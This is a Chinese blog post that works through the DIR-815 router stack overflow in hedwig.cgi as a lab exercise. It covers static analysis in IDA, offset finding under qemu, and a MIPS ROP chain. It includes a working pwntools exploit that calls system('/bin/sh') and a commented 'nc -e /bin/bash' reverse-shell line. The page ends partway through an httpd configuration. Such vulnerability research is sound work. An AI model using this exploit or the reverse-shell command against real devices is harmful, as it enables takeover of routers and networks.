<!doctype html>
<html lang="zh">
  <head>
    <title>【栈溢出】DIR-815漏洞复现 // 江南酒与燕赵歌</title>
    <link rel="shortcut icon" href="images/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.128.2">
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="John Doe" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.5b1fcc8902588589c4767187402a3c29f8b8d7a6fdef6d9f8f77045bb0d14fee.css" />
    

    
  


    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="【栈溢出】DIR-815漏洞复现">
  <meta name="twitter:description" content="1 环境准备 固件下载链接：DLink下载
物理机：Ubuntu 20.04 （需安装binwalk、qemu、pwntools等）
反汇编共工具：IDA Pro
2 静态分析 根据已有的资料，DIR-815多重栈溢出漏洞和前端的超长cookie有关，并且漏洞文件为 hedweb.cgi
首先对固件进行解包
binwalk -Me xxx.bin 找到漏洞文件路径：/htdocs/web/hedwig.cgi
是/htdocs/cgibin的软链接，因此，使用IDA逆向分析cgibin
在main函数中可以看到，此处为hedwigcgi_main函数分支
另外根据cgi-bin的架构和常用的变量，若要操作cookie，需使用getenv(&#34;HTTP_COOKIE&#34;)
直接搜索&#34;HTTP_COOKIE&#34;字符串，根据交叉引用，只有sess_get_uid这个函数使用了这 个字符串
继续通过交叉引用回溯，发现在hedwigcgi_main调用了这个函数
并且两次调用了sprintf这个危险函数，两次拼接使用的字符串都是sess_get_uid处理之后的v4，分析sess_get_uid函数可知，v4是COOKIE中的uid的值。
如果能走到第二个sprintf函数，则会覆盖上一次拼接的内容，则第二处sprintf是溢出点
两个判断需要满足的条件为：存在/var/tmp 目录以及环境变量REQUEST_URI不为空。
由于固件解包后不存在/var/tmp目录，故需要自己创建，否则后续测试偏移时由于无法走到第二个sprintf函数会出错。
3 动态调试 3.1 qemu用户模式复现 #!/bin/sh INPUT=&#34;uid=1234&#34; TEST=&#34;uid=1234`cat payload`&#34; LEN=$(echo -n &#34;INPUT&#34; |wc -c) PORT=&#34;1234&#34; cd ./squashfs-root cp $(which qemu-mipsel-static) ./qemu echo $INPUT | chroot . ./qemu -E CONTENT_LENGTH=$LEN -E CONTENT_TYPE=&#34;application/x-www-form-urlencoded&#34; -E REQUEST_METHOD=&#34;POST&#34; -E HTTP_COOKIE=$TEST -E REQUEST_URI=&#34;/hedwig.cgi&#34; -g $PORT /htdocs/web/hedwig.cgi rm -f ./qemu 用以上脚本启动qemu模拟CGI程序，其中">

    <meta property="og:url" content="https://zhu1ang.github.io/post/dir815/">
  <meta property="og:site_name" content="江南酒与燕赵歌">
  <meta property="og:title" content="【栈溢出】DIR-815漏洞复现">
  <meta property="og:description" content="1 环境准备 固件下载链接：DLink下载
物理机：Ubuntu 20.04 （需安装binwalk、qemu、pwntools等）
反汇编共工具：IDA Pro
2 静态分析 根据已有的资料，DIR-815多重栈溢出漏洞和前端的超长cookie有关，并且漏洞文件为 hedweb.cgi
首先对固件进行解包
binwalk -Me xxx.bin 找到漏洞文件路径：/htdocs/web/hedwig.cgi
是/htdocs/cgibin的软链接，因此，使用IDA逆向分析cgibin
在main函数中可以看到，此处为hedwigcgi_main函数分支
另外根据cgi-bin的架构和常用的变量，若要操作cookie，需使用getenv(&#34;HTTP_COOKIE&#34;)
直接搜索&#34;HTTP_COOKIE&#34;字符串，根据交叉引用，只有sess_get_uid这个函数使用了这 个字符串
继续通过交叉引用回溯，发现在hedwigcgi_main调用了这个函数
并且两次调用了sprintf这个危险函数，两次拼接使用的字符串都是sess_get_uid处理之后的v4，分析sess_get_uid函数可知，v4是COOKIE中的uid的值。
如果能走到第二个sprintf函数，则会覆盖上一次拼接的内容，则第二处sprintf是溢出点
两个判断需要满足的条件为：存在/var/tmp 目录以及环境变量REQUEST_URI不为空。
由于固件解包后不存在/var/tmp目录，故需要自己创建，否则后续测试偏移时由于无法走到第二个sprintf函数会出错。
3 动态调试 3.1 qemu用户模式复现 #!/bin/sh INPUT=&#34;uid=1234&#34; TEST=&#34;uid=1234`cat payload`&#34; LEN=$(echo -n &#34;INPUT&#34; |wc -c) PORT=&#34;1234&#34; cd ./squashfs-root cp $(which qemu-mipsel-static) ./qemu echo $INPUT | chroot . ./qemu -E CONTENT_LENGTH=$LEN -E CONTENT_TYPE=&#34;application/x-www-form-urlencoded&#34; -E REQUEST_METHOD=&#34;POST&#34; -E HTTP_COOKIE=$TEST -E REQUEST_URI=&#34;/hedwig.cgi&#34; -g $PORT /htdocs/web/hedwig.cgi rm -f ./qemu 用以上脚本启动qemu模拟CGI程序，其中">
  <meta property="og:locale" content="zh">
  <meta property="og:type" content="article">
    <meta property="article:section" content="post">
    <meta property="article:published_time" content="2024-07-11T10:15:39+08:00">
    <meta property="article:modified_time" content="2024-07-11T10:15:39+08:00">
    <meta property="article:tag" content="学习笔记">
    <meta property="article:tag" content="Iot">


  </head>
  <body>
    <header class="app-header">
      <a href="https://zhu1ang.github.io/"><img class="app-header-avatar" src="/images/ico.jpg" alt="John Doe" /></a>
      <span class="app-header-title">江南酒与燕赵歌</span>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             | 
          
          <a class="app-header-menu-item" href="/tags/">Tags</a>
             | 
          
          <a class="app-header-menu-item" href="/about/">About</a>
      </nav>
      <p>网安核动力驴.</p>
      <div class="app-header-social">
        
          <a href="https://github.com/zhu1ang" target="_blank" rel="noreferrer noopener me">
            <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>My Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">【栈溢出】DIR-815漏洞复现</h1>
      <div class="post-meta">
        <div>
          <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Jul 11, 2024
        </div>
        <div>
          <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          4 min read
        </div>
        <div>
          <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>
</svg>
              <a class="tag" href="https://zhu1ang.github.io/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a>
              <a class="tag" href="https://zhu1ang.github.io/tags/iot/">Iot</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <h3 id="1-环境准备">1 环境准备</h3>
<p>固件下载链接：<a href="https://github.com/zhu1ang/Image/tree/main/DLink">DLink下载</a></p>
<p>物理机：Ubuntu 20.04 （需安装binwalk、qemu、pwntools等）</p>
<p>反汇编共工具：IDA Pro</p>
<h3 id="2-静态分析">2 静态分析</h3>
<p>根据已有的资料，DIR-815多重栈溢出漏洞和前端的超长cookie有关，并且漏洞文件为 hedweb.cgi</p>
<p>首先对固件进行解包</p>
<pre tabindex="0"><code>binwalk -Me xxx.bin
</code></pre><p>找到漏洞文件路径：/htdocs/web/hedwig.cgi</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407091540599.png?x-oss-process=style/zzz" alt="image-20240709154025511"></p>
<p>是/htdocs/cgibin的软链接，因此，使用IDA逆向分析cgibin</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407100941912.png?x-oss-process=style/zzz" alt="image-20240710094135886"></p>
<p>在main函数中可以看到，此处为<code>hedwigcgi_main</code>函数分支</p>
<p>另外根据cgi-bin的架构和常用的变量，若要操作cookie，需使用<code>getenv(&quot;HTTP_COOKIE&quot;)</code></p>
<p>直接搜索&quot;HTTP_COOKIE&quot;字符串，根据交叉引用，只有<code>sess_get_uid</code>这个函数使用了这 个字符串</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407100945530.png?x-oss-process=style/zzz" alt="image-20240710094544488"></p>
<p>继续通过交叉引用回溯，发现在<code>hedwigcgi_main</code>调用了这个函数</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407100948382.png?x-oss-process=style/zzz" alt="image-20240710094835342"></p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407100949129.png?x-oss-process=style/zzz" alt="image-20240710094919075"></p>
<p>并且两次调用了<code>sprintf</code>这个危险函数，两次拼接使用的字符串都是<code>sess_get_uid</code>处理之后的v4，分析<code>sess_get_uid</code>函数可知，v4是COOKIE中的uid的值。</p>
<p>如果能走到第二个<code>sprintf</code>函数，则会覆盖上一次拼接的内容，则第二处<code>sprintf</code>是溢出点</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101006345.png?x-oss-process=style/zzz" alt="image-20240710100639313"></p>
<p>两个判断需要满足的条件为：存在/var/tmp 目录以及环境变量REQUEST_URI不为空。</p>
<p>由于固件解包后不存在/var/tmp目录，故需要自己创建，否则后续测试偏移时由于无法走到第二个<code>sprintf</code>函数会出错。</p>
<h3 id="3-动态调试">3 动态调试</h3>
<h4 id="31-qemu用户模式复现">3.1 qemu用户模式复现</h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/sh
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> INPUT<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;uid=1234&#34;</span>
</span></span><span style="display:flex;"><span> TEST<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;uid=1234`cat payload`&#34;</span>
</span></span><span style="display:flex;"><span> LEN<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo -n <span style="color:#e6db74">&#34;INPUT&#34;</span> |wc -c<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span> PORT<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;1234&#34;</span>
</span></span><span style="display:flex;"><span> cd ./squashfs-root
</span></span><span style="display:flex;"><span> cp <span style="color:#66d9ef">$(</span>which qemu-mipsel-static<span style="color:#66d9ef">)</span> ./qemu
</span></span><span style="display:flex;"><span> echo $INPUT | chroot . ./qemu -E CONTENT_LENGTH<span style="color:#f92672">=</span>$LEN -E CONTENT_TYPE<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;application/x-www-form-urlencoded&#34;</span> -E REQUEST_METHOD<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;POST&#34;</span> -E HTTP_COOKIE<span style="color:#f92672">=</span>$TEST -E REQUEST_URI<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/hedwig.cgi&#34;</span> -g $PORT /htdocs/web/hedwig.cgi
</span></span><span style="display:flex;"><span> rm -f ./qemu
</span></span></code></pre></div><p>用以上脚本启动qemu模拟CGI程序，其中</p>
<ul>
<li><code>cyclic 2000</code>生成2000字符作为payload</li>
<li>-E 选项添加环境变量即HTTP_COOKIE等</li>
</ul>
<p>使用以下命令启动</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>sudo ./local.sh  <span style="color:#75715e">#启动调试脚本</span>
</span></span><span style="display:flex;"><span>gdb-multiarch ./squashfs-root/htdocs/cgibin  <span style="color:#75715e">#多架构gdb调试</span>
</span></span><span style="display:flex;"><span>target remote 127.0.0.1:1234
</span></span><span style="display:flex;"><span>b *ret_addr  <span style="color:#75715e">#在hedwigcgi_main函数返回处下断点</span>
</span></span></code></pre></div><p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101110533.png?x-oss-process=style/zzz" alt="image-20240710111016460"></p>
<p>可以看到返回地址$ra已经被覆盖了</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101115252.png?x-oss-process=style/zzz" alt="image-20240710111510207"></p>
<p>测得偏移为1009</p>
<p><strong>接下来就是获取基地址</strong>：</p>
<ul>
<li>vmmap命令查看，很大概率会因为gdb版本问题导致命令执行无效</li>
<li>libc函数地址 - 偏移 = 基地址，延迟绑定特性、write、puts泄露等</li>
<li>读取程序的 <code>/proc/self/maps</code>来获取与程序相关的基地址</li>
</ul>
<p>第一个LOAD段中包含了共享库的代码段，其权限为r-xp，因此可以使用 ret2call，去调用system函数因此需要获取基地址</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101242651.png?x-oss-process=style/zzz" alt="image-20240710124242596"></p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101243806.png?x-oss-process=style/zzz" alt="image-20240710124310768"></p>
<p>通过延迟绑定机制计算基地址：</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101246839.png?x-oss-process=style/zzz" alt="image-20240710124615796"></p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101245926.png?x-oss-process=style/zzz" alt="image-20240710124551875"></p>
<p>基地址 = 0x7f76ca20 - 0x34a20 = 0x7f738000</p>
<p><strong>接下来的工作就是构造ROP链</strong></p>
<p>一般的x86的栈溢出可以直接覆盖返回地址与参数，但是MIPS的前四个参数是通过寄存器传递的，故不能直接覆盖栈来实现诸如<code>system('cmd')</code>的执行。</p>
<p>MIPS架构栈溢出特性：</p>
<ul>
<li>1分支延迟，例如跳转指令在跳转地址填充后，跳转之前，会先执行跳转指令的下一条指令</li>
<li>2缓存不一致，指令缓存区（<code>Instruction Cache</code>）和数据缓存区（<code>Data Cache</code>）两者的同步需要时间，即栈上写入的指令并不是立即可以执行的</li>
</ul>
<p>注意：<code>system</code>的地址为0x0053200，结尾是&rsquo;x00/&rsquo;，在<code>sprintf</code>函数拼接payload过程中会被截断，故此处考虑写入 system_addr - 1，再使用addiu &hellip; , 1 的gadget还原后再跳转</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101415653.png?x-oss-process=style/zzz" alt="image-20240710141507601"></p>
<p>通过IDA的mipsrop插件执行<code>mipsrop.stackfinder()</code>,找到0x159cc的gadget，这个gadget的作用是跳转$s0，并把$s5的值赋给$a0，也就是第一个参数寄存器。</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101419560.png?x-oss-process=style/zzz" alt="image-20240710141941517"></p>
<p>通过<code>mipsrop.find(&quot;addiu $s0 , 1&quot;)</code>找到第二个还原system_addr的gadget</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101344757.png?x-oss-process=style/zzz" alt="image-20240710134431676"></p>
<p>根据函数结束处的栈布局以及两个gadget进行ROP链的组装，得到exp如下：</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;mips&#39;</span>
</span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>endian <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;little&#39;</span>
</span></span><span style="display:flex;"><span>libc_base <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7F738000</span>
</span></span><span style="display:flex;"><span>system_offset <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x53200</span><span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>gadget1 <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x159cc</span>
</span></span><span style="display:flex;"><span>gadget2 <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x158C8</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#cmd = b&#34;nc -e /bin/bash  9999&#34;</span>
</span></span><span style="display:flex;"><span>cmd <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;/bin/sh&#34;</span>
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span><span style="color:#f92672">*</span>(<span style="color:#ae81ff">1009</span> <span style="color:#f92672">-</span> <span style="color:#ae81ff">36</span>)
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> p32(libc_base<span style="color:#f92672">+</span>system_offset) <span style="color:#75715e">#s0</span>
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;bbbb&#34;</span> <span style="color:#75715e">#s1</span>
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cccc&#34;</span> <span style="color:#75715e">#s2</span>
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;dddd&#34;</span> <span style="color:#75715e">#s3</span>
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;eeee&#34;</span> <span style="color:#75715e">#s4</span>
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> p32(libc_base<span style="color:#f92672">+</span>gadget1) <span style="color:#75715e">#s5</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># addiu   $s5, $sp, 0x10</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#  move    $a1, $s3</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#  move    $a2, $s1</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#  move    $t9, $s0</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#  jalr        $t9 </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#  move    $a0, $s5</span>
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;ffff&#34;</span> <span style="color:#75715e">#s6</span>
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;gggg&#34;</span> <span style="color:#75715e">#s7</span>
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;aaaa&#34;</span> <span style="color:#75715e">#fp</span>
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> p32(libc_base<span style="color:#f92672">+</span>gadget2) <span style="color:#75715e">#ra</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># move $t9, $s5    </span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># jalr    $t9</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># addiu   $s0, 1</span>
</span></span><span style="display:flex;"><span> 
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;b&#34;</span><span style="color:#f92672">*</span><span style="color:#ae81ff">0x10</span>   
</span></span><span style="display:flex;"><span>data <span style="color:#f92672">+=</span> cmd
</span></span><span style="display:flex;"><span>f<span style="color:#f92672">=</span>open(<span style="color:#e6db74">&#34;payload&#34;</span>,<span style="color:#e6db74">&#34;wb&#34;</span>)
</span></span><span style="display:flex;"><span>f<span style="color:#f92672">.</span>write(data)
</span></span><span style="display:flex;"><span>f<span style="color:#f92672">.</span>close()
</span></span></code></pre></div><p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101434232.png?x-oss-process=style/zzz" alt="image-20240710143435176"></p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101436512.png?x-oss-process=style/zzz" alt="image-20240710143627446"></p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407101445877.png?x-oss-process=style/zzz" alt="image-20240710144552840"></p>
<p>调试过程可以看出ROP链的构造没有问题，但是用户模式却无法打通，参考网上博客是这里<code>system</code>函数中有调用<code>fork()</code>函数，而用户模式是不支持多线程的，这里<code>fork()</code>的失败，会导致后面<code>$fp</code>是个空指针，就会出错。</p>
<p>故此处应使用ROP+shellcode方法</p>
<p>exp：</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"></code></pre></div><h4 id="32-qemu系统模式复现">3.2 qemu系统模式复现</h4>
<ol>
<li><strong>用户模式（User Mode）</strong>：
<ul>
<li>用户模式通常指的是在操作系统的用户空间下运行的程序或进程。在这种模式下，QEMU 可以模拟一个用户级别的环境，但不会涉及到底层的硬件操作或系统调用。</li>
<li>在用户模式下，程序的运行受到操作系统的隔离和限制，无法直接访问硬件设备或执行系统级操作。</li>
</ul>
</li>
<li><strong>系统模式（System Mode）</strong>：
<ul>
<li>系统模式，也称为&quot;全系统仿真&quot;（Full System Emulation），指的是 QEMU 模拟整个计算机系统，包括 CPU、内存、硬盘、网络设备等硬件组件。</li>
<li>在这种模式下，QEMU 可以运行完整的操作系统镜像，允许用户像在真实硬件上一样启动和使用操作系统。</li>
<li>系统模式提供了更接近真实环境的测试和开发平台，适用于操作系统开发、硬件兼容性测试、安全研究等场景。</li>
</ul>
</li>
</ol>
<p>两者的主要区别在于仿真的范围和深度：</p>
<ul>
<li>用户模式更侧重于应用程序层面的仿真，适用于开发和测试应用程序。</li>
<li>系统模式提供了更全面的仿真环境，包括硬件和操作系统层面，适用于底层开发和系统级测试。</li>
</ul>
<h5 id="321-配置qemu网络设置">3.2.1 配置qemu网络设置</h5>
<p>首先需要下载qemu虚拟机镜像文件：[qemu mips](<a href="https://people.debian.org/~aurel32/qemu/">Index of /~aurel32/qemu (debian.org)</a>)</p>
<p>然后使用启动脚本启动qemu虚拟机，并配置网络</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#! /bin/sh  
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>echo <span style="color:#e6db74">&#34;config net&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># 1</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># 这两句不能断开</span>
</span></span><span style="display:flex;"><span>brctl addbr br0
</span></span><span style="display:flex;"><span> <span style="color:#75715e">#ifconfig br0 up</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># or</span>
</span></span><span style="display:flex;"><span>ip link set br0 up
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># 2</span>
</span></span><span style="display:flex;"><span>brctl addif br0 ens33
</span></span><span style="display:flex;"><span> <span style="color:#75715e">#ifconfig ens33 0.0.0.0</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># or</span>
</span></span><span style="display:flex;"><span>ip addr add 0.0.0.0 dev ens33
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># 3</span>
</span></span><span style="display:flex;"><span>dhclient br0
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># 4</span>
</span></span><span style="display:flex;"><span>tunctl -t tap0 -u <span style="color:#e6db74">`</span>whoami<span style="color:#e6db74">`</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#ifconfig tap0 up</span>
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># or</span>
</span></span><span style="display:flex;"><span>ip link set tap0 up
</span></span><span style="display:flex;"><span>brctl addif br0 tap0
</span></span><span style="display:flex;"><span> <span style="color:#75715e"># 5</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;qemu start &#34;</span>
</span></span><span style="display:flex;"><span>sudo qemu-system-mipsel -M malta -kernel ./vmlinux-3.2.0-4-4kc-malta -hda ./debian_squeeze_mipsel_standard.qcow2 -append <span style="color:#e6db74">&#34;root=/dev/sda1 console=tty0&#34;</span> -net nic -net tap,ifname<span style="color:#f92672">=</span>tap0,script<span style="color:#f92672">=</span>no,downscript<span style="color:#f92672">=</span>no -nographic
</span></span></code></pre></div><p>等待启动完成，qemu的默认登录为：root/root，登录后使用ifconfig查看网卡信息——如果此时eth0网卡存在但没有IP，可以使用<strong>ifconfig eth0 ip/24 up</strong>手动分配ip，注意要和宿主机在同一网卡下。</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407111459768.png?x-oss-process=style/zzz" alt="image-20240711145923567"></p>
<p>互相测试能否ping通</p>
<h5 id="322-上传固件">3.2.2 上传固件</h5>
<p>需要在qemu虚拟机使用chroot切换根目录，并执行shell，因此需要将物理机中解压出来的文件系统上传到qemu虚拟机中。</p>
<pre tabindex="0"><code>scp -r squashfs-root/ root@qemu_IP:/path/
</code></pre><p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407111520802.png?x-oss-process=style/zzz" alt="image-20240711152008625"></p>
<h5 id="323开启httpd服务">3.2.3开启httpd服务</h5>
<p>在<code>qemu</code>虚拟机的<code>squashfs-root</code>目录下新建一个<code>http_conf</code>配置文件，里面写入（注意修改49行的ip）：</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span>Umask <span style="color:#ae81ff">026</span>
</span></span><span style="display:flex;"><span>PIDFile <span style="color:#f92672">/</span>var<span style="color:#f92672">/</span>run<span style="color:#f92672">/</span>httpd.pid
</span></span><span style="display:flex;"><span>LogGMT On  <span style="color:#960050;background-color:#1e0010">#开启</span>log
</span></span><span style="display:flex;"><span>ErrorLog <span style="color:#f92672">/</span>log <span style="color:#960050;background-color:#1e0010">#</span>log文件
</span></span><span style="display:flex;"><span> 
</span></span><span style="display:flex;"><span>Tuning
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    NumConnections <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>    BufSize <span style="color:#ae81ff">12288</span>
</span></span><span style="display:flex;"><span>    InputBufSize <span style="color:#ae81ff">4096</span>
</span></span><span style="display:flex;"><span>    ScriptBufSize <span style="color:#ae81ff">4096</span>
</span></span><span style="display:flex;"><span>    NumHeaders <span style="color:#ae81ff">100</span>
</span></span><span style="display:flex;"><span>    Timeout <span style="color:#ae81ff">60</span>
</span></span><span style="display:flex;"><span>    ScriptTimeout <span style="color:#ae81ff">60</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span> 
</span></span><span style="display:flex;"><span>Control
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    Types
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        text<span style="color:#f92672">/</span>html    { html htm }
</span></span><span style="display:flex;"><span>        text<span style="color:#f92672">/</span>xml    { xml }
</span></span><span style="display:flex;"><span>        text<span style="color:#f92672">/</span>plain    { txt }
</span></span><span style="display:flex;"><span>        image<span style="color:#f92672">/</span>gif    { gif }
</span></span><span style="display:flex;"><span>        image<span style="color:#f92672">/</span>jpeg    { jpg }
</span></span><span style="display:flex;"><span>        text<span style="color:#f92672">/</span>css    { css }
</span></span><span style="display:flex;"><span>        application<span style="color:#f92672">/</span>octet<span style="color:#f92672">-</span>stream { <span style="color:#f92672">*</span> }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    Specials
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        Dump        { <span style="color:#f92672">/</span>dump }
</span></span><span style="display:flex;"><span>        CGI            { cgi }
</span></span><span style="display:flex;"><span>        Imagemap    { map }
</span></span><span style="display:flex;"><span>        Redirect    { url }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    External
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">/</span>usr<span style="color:#f92672">/</span>sbin<span style="color:#f92672">/</span>phpcgi { php }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span> 
</span></span><span style="display:flex;"><span> 
</span></span><span style="display:flex;"><span>Server
</span></span><span style="display:flex;"><span>{
